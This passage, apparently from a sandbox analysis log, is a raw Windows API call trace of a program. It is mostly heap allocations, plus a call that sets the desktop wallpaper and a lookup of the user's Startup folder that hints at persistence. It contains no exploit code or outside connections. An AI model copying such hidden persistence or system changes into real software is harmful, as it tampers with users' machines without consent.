Size=0x10) returned 0x2aab998 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0245.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0245.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0245.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0245.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0245.882] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0245.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f71a0 [0245.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f71a0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0245.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0245.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0245.883] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0245.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0245.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0245.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0245.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0245.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0245.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0245.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0245.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.884] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0245.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0245.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0245.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0245.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0245.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0245.997] FreeLibrary (hLibModule=0x76240000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0245.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0245.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0245.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866c48 | out: hHeap=0x2af0000) returned 1 [0245.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0245.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0245.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0246.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0246.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0246.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0246.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0246.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0246.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0246.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0246.001] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0246.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0246.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0246.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0246.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0246.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0246.002] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0246.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0246.002] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0246.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0246.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0246.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0246.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0246.003] 